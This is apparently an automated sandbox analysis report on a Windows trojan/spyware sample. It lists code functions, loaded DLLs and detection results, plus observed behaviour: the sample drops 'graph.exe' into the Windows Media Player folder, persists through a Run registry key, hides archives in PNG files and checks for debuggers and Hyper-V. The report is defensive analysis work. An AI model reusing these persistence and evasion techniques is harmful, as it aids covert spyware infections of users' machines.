Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF72CA0A1C80_2_00007FF72CA0A1C8
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF72C9C21C00_2_00007FF72C9C21C0
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF72C9FB1E40_2_00007FF72C9FB1E4
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF72C9E01900_2_00007FF72C9E0190
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF72CA122980_2_00007FF72CA12298
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF72CA152F00_2_00007FF72CA152F0
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF72C9FA2900_2_00007FF72C9FA290
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF72C9B13D00_2_00007FF72C9B13D0
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF72C9E83A00_2_00007FF72C9E83A0
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF72C9ED4100_2_00007FF72C9ED410
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF72C9BE4AA0_2_00007FF72C9BE4AA
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF72C9FA4940_2_00007FF72C9FA494
Source: C:\Program Files\Windows Media Player\graph\graph.exeCode function: 4_2_00007FF67D6F39904_2_00007FF67D6F3990
Source: C:\Program Files\Windows Media Player\graph\graph.exeCode function: 4_2_00007FF67D6FCD7C4_2_00007FF67D6FCD7C
Source: C:\Program Files\Windows Media Player\graph\graph.exeCode function: 4_2_00007FF67D70EDA04_2_00007FF67D70EDA0
Source: C:\Program Files\Windows Media Player\graph\graph.exeCode function: 4_2_00007FF67D70FA544_2_00007FF67D70FA54
Source: C:\Program Files\Windows Media Player\graph\graph.exeCode function: 4_2_00007FF67D705B144_2_00007FF67D705B14
Source: C:\Program Files\Windows Media Player\graph\graph.exeCode function: 4_2_00007FF67D70E2004_2_00007FF67D70E200
Source: C:\Program Files\Windows Media Player\graph\graph.exeCode function: 4_2_00007FF67D7081A44_2_00007FF67D7081A4
Source: C:\Program Files\Windows Media Player\graph\graph.exeCode function: 4_2_00007FF67D7129B44_2_00007FF67D7129B4
Source: C:\Program Files\Windows Media Player\graph\graph.exeCode function: 4_2_00007FF67D7114A44_2_00007FF67D7114A4
Source: C:\Program Files\Windows Media Player\graph\graph.exeCode function: 4_2_00007FF67D6F54C04_2_00007FF67D6F54C0
Source: C:\Program Files\Windows Media Player\graph\graph.exeCode function: 4_2_00007FF67D6F4C004_2_00007FF67D6F4C00
Source: C:\Program Files\Windows Media Player\graph\graph.exeCode function: 4_2_00007FF67D7073E84_2_00007FF67D7073E8
Source: C:\Program Files\Windows Media Player\graph\graph.exeCode function: 4_2_00007FF67D703BD04_2_00007FF67D703BD0
Source: C:\Users\user\Desktop\file.exeCode function: String function: 00007FF72C9D08C0 appears 31 times
Source: C:\Users\user\Desktop\file.exeCode function: String function: 00007FF72C9D1B10 appears 35 times
Source: C:\Users\user\Desktop\file.exeCode function: String function: 00007FF72C9E92E0 appears 33 times
Source: C:\Users\user\Desktop\file.exeCode function: String function: 00007FF72C9D60E0 appears 31 times
Source: C:\Users\user\Desktop\file.exeCode function: String function: 00007FF72C9CF4A0 appears 112 times
Source: C:\Users\user\Desktop\file.exeCode function: String function: 00007FF72C9E8F10 appears 31 times
Source: C:\Users\user\Desktop\file.exeCode function: String function: 00007FF72C9D44A0 appears 127 times
Source: file.exeBinary or memory string: OriginalFilename vs file.exe
Source: file.exe, 00000000.00000000.2149997918.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamewusvc4 vs file.exe
Source: file.exe, 00000002.00000002.2327010985.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamewusvc4 vs file.exe
Source: file.exeBinary or memory string: OriginalFilenamewusvc4 vs file.exe
Source: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\output[1].png, type: DROPPEDMatched rule: INDICATOR_SUSPICIOUS_IMG_Embedded_Archive author = ditekSHen, description = Detects images embedding archives. Observed in TheRat RAT.
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\output[1].png, type: DROPPEDMatched rule: INDICATOR_SUSPICIOUS_IMG_Embedded_Archive author = ditekSHen, description = Detects images embedding archives. Observed in TheRat RAT.
Source: C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f, type: DROPPEDMatched rule: INDICATOR_SUSPICIOUS_IMG_Embedded_Archive author = ditekSHen, description = Detects images embedding archives. Observed in TheRat RAT.
Source: classification engineClassification label: mal80.troj.spyw.winEXE@8/9@4/4
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF72C9B5D60 CreateToolhelp32Snapshot,Process32FirstW,OpenProcess,TerminateProcess,CloseHandle,Process32NextW,CloseHandle,Sleep,SleepEx,_invalid_parameter_noinfo_noreturn,0_2_00007FF72C9B5D60
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF72C9C5EC0 GetModuleFileNameA,GetLastError,GetLastError,CoInitializeEx,CoCreateInstance,CoUninitialize,VariantInit,VariantInit,VariantInit,VariantInit,VariantClear,VariantClear,VariantClear,VariantClear,CoUninitialize,SysAllocString,SysFreeString,CoUninitialize,SysAllocString,SysFreeString,CoUninitialize,CoUninitialize,CoUninitialize,CoUninitialize,CoUninitialize,CoUninitialize,SysFreeString,CoUninitialize,SysAllocString,VariantInit,SysAllocString,SysAllocString,SysFreeString,VariantClear,VariantClear,VariantClear,CoUninitialize,CoUninitialize,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,0_2_00007FF72C9C5EC0
Source: C:\Users\user\Desktop\file.exeFile created: C:\Program Files\Google\Chrome\ExtensionsJump to behavior
Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\output[1].pngJump to behavior
Source: file.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: file.exeReversingLabs: Detection: 63%
Source: unknownProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: unknownProcess created: C:\Users\user\Desktop\file.exe C:\Users\user\Desktop\file.exe
Source: C:\Users\user\Desktop\file.exeProcess created: C:\Program Files\Windows Media Player\graph\graph.exe "C:\Program Files\Windows Media Player\graph\graph.exe"
Source: C:\Users\user\Desktop\file.exeProcess created: C:\Program Files\Windows Media Player\graph\graph.exe "C:\Program Files\Windows Media Player\graph\graph.exe"
Source: unknownProcess created: C:\Program Files\Windows Media Player\graph\graph.exe "C:\Program Files\Windows Media Player\graph\graph.exe"
Source: unknownProcess created: C:\Program Files\Windows Media Player\graph\graph.exe "C:\Program Files\Windows Media Player\graph\graph.exe"
Source: C:\Users\user\Desktop\file.exeProcess created: C:\Program Files\Windows Media Player\graph\graph.exe "C:\Program Files\Windows Media Player\graph\graph.exe"Jump to behavior
Source: C:\Users\user\Desktop\file.exeProcess created: C:\Program Files\Windows Media Player\graph\graph.exe "C:\Program Files\Windows Media Player\graph\graph.exe"Jump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: netapi32.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: wininet.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: samcli.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: taskschd.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: xmllite.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: schannel.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: samlib.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: netapi32.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: wininet.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: samcli.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: taskschd.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: xmllite.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: schannel.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: samlib.dllJump to behavior
Source: C:\Program Files\Windows Media Player\graph\graph.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Program Files\Windows Media Player\graph\graph.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Program Files\Windows Media Player\graph\graph.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Program Files\Windows Media Player\graph\graph.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Program Files\Windows Media Player\graph\graph.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32Jump to behavior
Source: C:\Users\user\Desktop\file.exeDirectory created: C:\Program Files\Google\Chrome\ExtensionsJump to behavior
Source: C:\Users\user\Desktop\file.exeDirectory created: C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5fJump to behavior
Source: C:\Users\user\Desktop\file.exeDirectory created: C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5fzipJump to behavior
Source: C:\Users\user\Desktop\file.exeDirectory created: C:\Program Files\Windows Media Player\graphJump to behavior
Source: C:\Users\user\Desktop\file.exeDirectory created: C:\Program Files\Windows Media Player\graph\graph.exeJump to behavior
Source: C:\Users\user\Desktop\file.exeDirectory created: C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5fJump to behavior
Source: C:\Users\user\Desktop\file.exeDirectory created: C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5fzipJump to behavior
Source: file.exeStatic PE information: Image base 0x140000000 > 0x60000000
Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: file.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: D:\exe\final\final\graph\x64\Release\graph.pdb% source: file.exe, 00000000.00000003.2261377843.000001E429283000.00000004.00000020.00020000.00000000.sdmp, graph.exe, 00000004.00000000.2261561392.00007FF67D719000.00000002.00000001.01000000.00000007.sdmp, graph.exe, 00000004.00000002.4001980452.00007FF67D719000.00000002.00000001.01000000.00000007.sdmp, graph.exe, 00000005.00000000.2285577697.00007FF67D719000.00000002.00000001.01000000.00000007.sdmp, graph.exe, 00000005.00000002.4001973279.00007FF67D719000.00000002.00000001.01000000.00000007.sdmp, graph.exe, 00000006.00000002.4001926398.00007FF67D719000.00000002.00000001.01000000.00000007.sdmp, graph.exe, 00000006.00000000.2357174678.00007FF67D719000.00000002.00000001.01000000.00000007.sdmp, graph.exe, 00000007.00000002.4001924174.00007FF67D719000.00000002.00000001.01000000.00000007.sdmp, graph.exe, 00000007.00000000.2437643141.00007FF67D719000.00000002.00000001.01000000.00000007.sdmp, graph.exe.0.dr
Source: Binary string: D:\exe\final\merged_final\x64\Release\fetcher2.pdb source: file.exe
Source: Binary string: D:\exe\final\merged_final\x64\Release\fetcher2.pdb[ source: file.exe
Source: Binary string: D:\exe\final\final\graph\x64\Release\graph.pdb source: file.exe, 00000000.00000003.2261377843.000001E429283000.00000004.00000020.00020000.00000000.sdmp, graph.exe, 00000004.00000000.2261561392.00007FF67D719000.00000002.00000001.01000000.00000007.sdmp, graph.exe, 00000004.00000002.4001980452.00007FF67D719000.00000002.00000001.01000000.00000007.sdmp, graph.exe, 00000005.00000000.2285577697.00007FF67D719000.00000002.00000001.01000000.00000007.sdmp, graph.exe, 00000005.00000002.4001973279.00007FF67D719000.00000002.00000001.01000000.00000007.sdmp, graph.exe, 00000006.00000002.4001926398.00007FF67D719000.00000002.00000001.01000000.00000007.sdmp, graph.exe, 00000006.00000000.2357174678.00007FF67D719000.00000002.00000001.01000000.00000007.sdmp, graph.exe, 00000007.00000002.4001924174.00007FF67D719000.00000002.00000001.01000000.00000007.sdmp, graph.exe, 00000007.00000000.2437643141.00007FF67D719000.00000002.00000001.01000000.00000007.sdmp, graph.exe.0.dr
Source: file.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: file.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: file.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: file.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: file.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Persistence and Installation Behavior

barindex
Creates files in the system32 config directory
Source: C:\Users\user\Desktop\file.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\output[1].pngJump to behavior
Source: C:\Users\user\Desktop\file.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\json[1].jsonJump to behavior
Source: C:\Users\user\Desktop\file.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\sendMessage[1].jsonJump to behavior
Source: C:\Users\user\Desktop\file.exeFile created: C:\Program Files\Windows Media Player\graph\graph.exeJump to dropped file
Source: C:\Users\user\Desktop\file.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run GraphJump to behavior
Source: C:\Users\user\Desktop\file.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run GraphJump to behavior
Source: C:\Users\user\Desktop\file.exeRegistry value created or modified: HKEY_USERS.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run GraphJump to behavior
Source: C:\Users\user\Desktop\file.exeRegistry value created or modified: HKEY_USERS.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run GraphJump to behavior
Source: C:\Users\user\Desktop\file.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
Source: C:\Users\user\Desktop\file.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
Source: C:\Users\user\Desktop\file.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
Source: C:\Users\user\Desktop\file.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
Source: C:\Program Files\Windows Media Player\graph\graph.exeAPI coverage: 3.1 %
Source: C:\Program Files\Windows Media Player\graph\graph.exe TID: 5844Thread sleep count: 166 > 30Jump to behavior
Source: C:\Program Files\Windows Media Player\graph\graph.exe TID: 5844Thread sleep time: -166000s >= -30000sJump to behavior
Source: C:\Program Files\Windows Media Player\graph\graph.exe TID: 5688Thread sleep count: 163 > 30Jump to behavior
Source: C:\Program Files\Windows Media Player\graph\graph.exe TID: 5688Thread sleep time: -163000s >= -30000sJump to behavior
Source: C:\Program Files\Windows Media Player\graph\graph.exe TID: 5696Thread sleep count: 157 > 30Jump to behavior
Source: C:\Program Files\Windows Media Player\graph\graph.exe TID: 5696Thread sleep time: -157000s >= -30000sJump to behavior
Source: C:\Program Files\Windows Media Player\graph\graph.exe TID: 612Thread sleep count: 150 > 30Jump to behavior
Source: C:\Program Files\Windows Media Player\graph\graph.exe TID: 612Thread sleep time: -150000s >= -30000sJump to behavior
Source: C:\Program Files\Windows Media Player\graph\graph.exeLast function: Thread delayed
Source: C:\Program Files\Windows Media Player\graph\graph.exeLast function: Thread delayed
Source: C:\Program Files\Windows Media Player\graph\graph.exeLast function: Thread delayed
Source: C:\Program Files\Windows Media Player\graph\graph.exeLast function: Thread delayed
Source: C:\Program Files\Windows Media Player\graph\graph.exeLast function: Thread delayed
Source: C:\Program Files\Windows Media Player\graph\graph.exeLast function: Thread delayed
Source: C:\Program Files\Windows Media Player\graph\graph.exeLast function: Thread delayed
Source: C:\Program Files\Windows Media Player\graph\graph.exeLast function: Thread delayed
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF72C9B9B00 GetEnvironmentVariableW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,Concurrency::cancel_current_task,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,0_2_00007FF72C9B9B00
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF72C9EE3CC FindClose,FindFirstFileExW,GetLastError,0_2_00007FF72C9EE3CC
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF72C9EE440 GetFileAttributesExW,GetLastError,FindFirstFileW,GetLastError,FindClose,__std_fs_open_handle,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,CloseHandle,CloseHandle,0_2_00007FF72C9EE440
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF72CA1070C FindFirstFileExW,0_2_00007FF72CA1070C
Source: C:\Program Files\Windows Media Player\graph\graph.exeCode function: 4_2_00007FF67D6FCD7C GetFileAttributesExW,GetLastError,FindFirstFileW,GetLastError,FindClose,__std_fs_open_handle,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,CloseHandle,CloseHandle,4_2_00007FF67D6FCD7C
Source: C:\Program Files\Windows Media Player\graph\graph.exeCode function: 4_2_00007FF67D70FA54 FindFirstFileExW,4_2_00007FF67D70FA54
Source: C:\Program Files\Windows Media Player\graph\graph.exeCode function: 4_2_00007FF67D6FCD08 FindClose,FindFirstFileExW,GetLastError,4_2_00007FF67D6FCD08
Source: file.exe, 00000000.00000003.2261006797.000001E42769C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2302541318.000001E42769A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2261006797.000001E427663000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2302541318.000001E427663000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000002.2326412111.00000207054E2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.2285253534.00000207054E4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000002.2326412111.0000020705452000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: file.exe, 00000000.00000002.2302541318.000001E4275F9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW@
Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF72C9FCA44 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF72C9FCA44
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF72C9F2348 GetLastError,IsDebuggerPresent,OutputDebugStringW,0_2_00007FF72C9F2348
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF72CA11EF8 GetProcessHeap,0_2_00007FF72CA11EF8
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF72C9FCA44 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF72C9FCA44
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF72C9F36EC IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF72C9F36EC
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF72C9F2798 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00007FF72C9F2798
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF72C9F38CC SetUnhandledExceptionFilter,0_2_00007FF72C9F38CC
Source: C:\Program Files\Windows Media Player\graph\graph.exeCode function: 4_2_00007FF67D70364C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_00007FF67D70364C
Source: C:\Program Files\Windows Media Player\graph\graph.exeCode function: 4_2_00007FF67D6FE6D0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_00007FF67D6FE6D0
Source: C:\Program Files\Windows Media Player\graph\graph.exeCode function: 4_2_00007FF67D6FE8B0 SetUnhandledExceptionFilter,4_2_00007FF67D6FE8B0
Source: C:\Program Files\Windows Media Player\graph\graph.exeCode function: 4_2_00007FF67D6FE3EC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_00007FF67D6FE3EC
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF72CA18D10 cpuid 0_2_00007FF72CA18D10
Source: C:\Users\user\Desktop\file.exeCode function: GetLocaleInfoW,0_2_00007FF72CA08D4C
Source: C:\Users\user\Desktop\file.exeCode function: GetLocaleInfoEx,FormatMessageA,0_2_00007FF72C9EDF9C
Source: C:\Users\user\Desktop\file.exeCode function: EnumSystemLocalesW,0_2_00007FF72CA14060
Source: C:\Users\user\Desktop\file.exeCode function: TranslateName,TranslateName,GetACP,IsValidCodePage,GetLocaleInfoW,0_2_00007FF72CA13D04
Source: C:\Users\user\Desktop\file.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_00007FF72CA14568
Source: C:\Users\user\Desktop\file.exeCode function: GetLocaleInfoW,0_2_00007FF72CA14618
Source: C:\Users\user\Desktop\file.exeCode function: EnumSystemLocalesW,GetUserDefaultLCID,ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,0_2_00007FF72CA1474C
Source: C:\Users\user\Desktop\file.exeCode function: EnumSystemLocalesW,0_2_00007FF72CA08874
Source: C:\Users\user\Desktop\file.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,0_2_00007FF72CA141C8
Source: C:\Users\user\Desktop\file.exeCode function: EnumSystemLocalesW,0_2_00007FF72CA14130
Source: C:\Users\user\Desktop\file.exeCode function: GetLocaleInfoW,0_2_00007FF72CA14410
Source: C:\Program Files\Windows Media Player\graph\graph.exeCode function: GetLocaleInfoW,4_2_00007FF67D713650
Source: C:\Program Files\Windows Media Player\graph\graph.exeCode function: GetLocaleInfoW,4_2_00007FF67D70A83C
